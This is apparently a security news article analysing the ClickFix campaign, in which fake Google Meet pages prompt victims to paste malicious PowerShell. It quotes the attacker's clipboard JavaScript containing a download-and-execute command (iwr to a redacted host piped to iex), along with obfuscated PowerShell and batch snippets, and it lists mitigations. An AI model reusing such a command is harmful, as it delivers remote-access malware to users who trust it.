How Google Meet Pages Are Exploited to Deliver PowerShell Malware
A new wave of cyberattacks exploits user trust in Google Meet by deploying meticulously crafted fake meeting pages that trick victims into running malicious PowerShell commands.
This campaign, dubbed ClickFix, leverages advanced social engineering tactics, bypassing traditional security measures and targeting Windows and macOS systems.
The attack begins with phishing emails containing links that closely mimic legitimate Google Meet invitations.
Unsuspecting users who click these links are directed to a fraudulent page that perfectly replicates the Google Meet interface.
Instead of asking for login credentials, the site presents a fabricated error message—often a “Microphone Permission Denied” alert—and urges users to “fix” the issue by copying and pasting a provided PowerShell command into their terminal.
The technical bait is delivered through a JavaScript function:
javascriptfunction copyToClipboard() {
const text="powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex # Verification ID: 116772";
navigator.clipboard.writeText(text)
}
Once the user follows the instructions, the pasted command silently downloads and executes a remote access trojan (RAT), granting attackers full control over the compromised system.
Technical Anatomy of the ClickFix Malware
The malicious PowerShell command is the linchpin of the ClickFix campaign.
It employs the Invoke-WebRequest (iwr) cmdlet to fetch an obfuscated script (XR.txt) from the attacker’s server and immediately executes it using the Invoke-Expression (iex) cmdlet.
This downloaded script decodes itself at runtime and launches further malicious payloads directly in memory, evading many endpoint protections.
A snippet of the de-obfuscated PowerShell code:
powershellAdd-Type -AssemblyName System.Windows.Forms;
[System.Windows.Forms.MessageBox]::Show('Verification complete!', 'Information', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);
# Obfuscated payload follows...
& $udVDkdtSF.Substring(0,3) $udVDkdtSF.Substring(46);exit;
The next stage involves downloading a batch file (noanti-vm.bat) into the victim’s AppData directory.
This batch script is heavily obfuscated using environment variable manipulation and string slicing, a technique that reconstructs commands from scattered variables to evade detection:
text%UMOGM:~2,1%%FkYBZvOHArkFVTJLVCDt:~6,1%%ZeGUDpukA:~2,1%...
This decodes to:
textSeTLOCaL EnableDeLayEDEXpaNSion
Once executed, the RAT can exfiltrate sensitive data, install additional malware such as infostealers (e.g., Lumma Stealer, DarkGate), and provide persistent remote access to the attackers.
The Broader Threat Landscape and Mitigation Strategies
What sets the ClickFix campaign apart is its reliance on manual user execution.
Because the malicious PowerShell code is run by the user rather than automatically triggered by a downloaded file, it can bypass many traditional security tools that monitor automated script execution.
The campaign’s infrastructure is attributed to organized trafficker groups, notably Slavic Nation Empire and Scamquerteo, who share templates and backend resources to scale their attacks.
Recommended mitigation strategies include:
- Enforcing strict PowerShell execution policies (allow only signed scripts)
- Employing application controls to restrict unauthorized program execution
- Training users to recognize social engineering tactics and suspicious prompts
- Filtering web content to block access to known malicious domains
- Regularly scanning systems for unauthorized scripts and malware
The stark reality is that a single careless action—copying and pasting a command from an untrusted source—can result in a complete system compromise.
As these attacks become more sophisticated and convincing, ongoing user education and layered security controls are essential to defend against the evolving threat landscape.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link
